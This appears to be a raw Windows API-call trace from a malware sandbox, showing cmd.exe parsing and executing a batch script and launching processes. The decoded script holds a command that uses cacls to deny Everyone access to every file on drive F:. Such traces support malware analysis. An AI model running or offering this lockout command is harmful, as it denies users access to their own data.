SetFilePointer (in: hFile=0x94, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0036.781] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0036.781] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x579, lpOverlapped=0x0) returned 1 [0036.781] SetFilePointer (in: hFile=0x94, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0036.781] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 38 [0036.781] GetFileType (hFile=0x94) returned 0x1 [0036.781] _get_osfhandle (_FileHandle=3) returned 0x94 [0036.781] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0036.782] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.782] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.782] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.782] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.782] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.782] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.782] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.782] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0036.782] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0036.782] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0036.782] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0036.782] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0036.782] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0036.782] _tell (_FileHandle=3) returned 1307 [0036.782] _close (_FileHandle=3) returned 0 [0036.782] _pipe (in: _PtHandles=0xd25ef8, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd25ef8) returned 0 [0036.782] _dup (_FileHandle=1) returned 5 [0036.782] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0036.782] _close (_FileHandle=4) returned 0 [0036.782] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.782] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.782] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.782] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.782] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.783] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.783] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.783] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.783] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.783] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.783] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.783] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.783] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.783] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.783] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.783] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.783] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.783] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.783] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.783] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.783] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.783] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0036.783] SetErrorMode (uMode=0x0) returned 0x0 [0036.783] SetErrorMode (uMode=0x1) returned 0x0 [0036.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd17f78, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0036.783] SetErrorMode (uMode=0x0) returned 0x1 [0036.783] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0036.783] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.783] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.783] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd18078 [0036.783] FindClose (in: hFindFile=0xd18078 | out: hFindFile=0xd18078) returned 1 [0036.783] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0036.783] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0036.784] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.784] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.784] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.784] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.785] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.785] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.785] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x8c, hThread=0x80, dwProcessId=0x9a4, dwThreadId=0x5e4)) returned 1 [0036.790] CloseHandle (hObject=0x80) returned 1 [0036.790] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.790] GetEnvironmentStringsW () returned 0xd1b020* [0036.790] FreeEnvironmentStringsA (penv="=") returned 1 [0036.790] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.790] _get_osfhandle (_FileHandle=3) returned 0x94 [0036.790] DuplicateHandle (in: hSourceProcessHandle=0x8c, hSourceHandle=0x94, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0036.790] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0036.790] _close (_FileHandle=5) returned 0 [0036.790] _dup (_FileHandle=0) returned 4 [0036.790] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0036.790] _close (_FileHandle=3) returned 0 [0036.790] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.790] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.790] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.790] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.790] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.790] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.790] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.790] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.790] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.790] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.790] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.790] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.790] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.790] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.790] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.790] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.790] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.790] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.790] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.791] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.791] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.791] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.791] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.791] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.791] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.791] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.791] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.791] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.791] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.791] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.791] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.791] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.791] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.791] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.791] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.791] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.791] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.791] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.791] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.791] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.791] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.791] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.791] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.791] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.791] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.791] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.791] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.791] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.791] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.791] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.791] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.791] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.791] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.791] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.791] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.791] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.791] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.791] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.791] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.791] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.791] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.791] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.791] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.791] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.792] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.792] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.792] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.792] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.792] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.792] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.792] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.792] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.792] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.792] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.792] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.792] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.792] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.792] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.792] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.792] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.792] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.792] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.792] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.792] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.792] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0036.792] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0036.792] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0036.792] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.792] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.792] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.792] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.792] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.792] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.792] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.792] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.792] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.792] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.792] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.792] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.792] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.792] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.792] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.792] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.793] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.793] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.793] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.793] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.793] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.793] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.793] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.793] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.793] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.793] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.793] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.793] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.793] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.793] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.793] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.793] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.793] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.793] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.793] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.793] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.793] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.793] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.793] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.793] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.793] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.793] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.793] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.793] SetErrorMode (uMode=0x0) returned 0x0 [0036.793] SetErrorMode (uMode=0x1) returned 0x0 [0036.793] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd18080, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0036.793] SetErrorMode (uMode=0x0) returned 0x1 [0036.793] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.793] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.793] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.793] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.793] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.794] GetLastError () returned 0x2 [0036.794] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18268 [0036.794] FindClose (in: hFindFile=0xd18268 | out: hFindFile=0xd18268) returned 1 [0036.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.794] GetLastError () returned 0x2 [0036.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18268 [0036.794] FindClose (in: hFindFile=0xd18268 | out: hFindFile=0xd18268) returned 1 [0036.794] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.794] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.794] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.794] SetErrorMode (uMode=0x0) returned 0x0 [0036.794] SetErrorMode (uMode=0x1) returned 0x0 [0036.794] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1b028, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0036.794] SetErrorMode (uMode=0x0) returned 0x1 [0036.794] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.795] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.795] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.795] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.795] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.795] GetLastError () returned 0x2 [0036.795] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.795] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd18550 [0036.795] FindClose (in: hFindFile=0xd18550 | out: hFindFile=0xd18550) returned 1 [0036.795] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.795] GetLastError () returned 0x2 [0036.795] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd18550 [0036.795] FindClose (in: hFindFile=0xd18550 | out: hFindFile=0xd18550) returned 1 [0036.795] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.795] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.795] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.796] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.796] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.796] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.796] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.796] 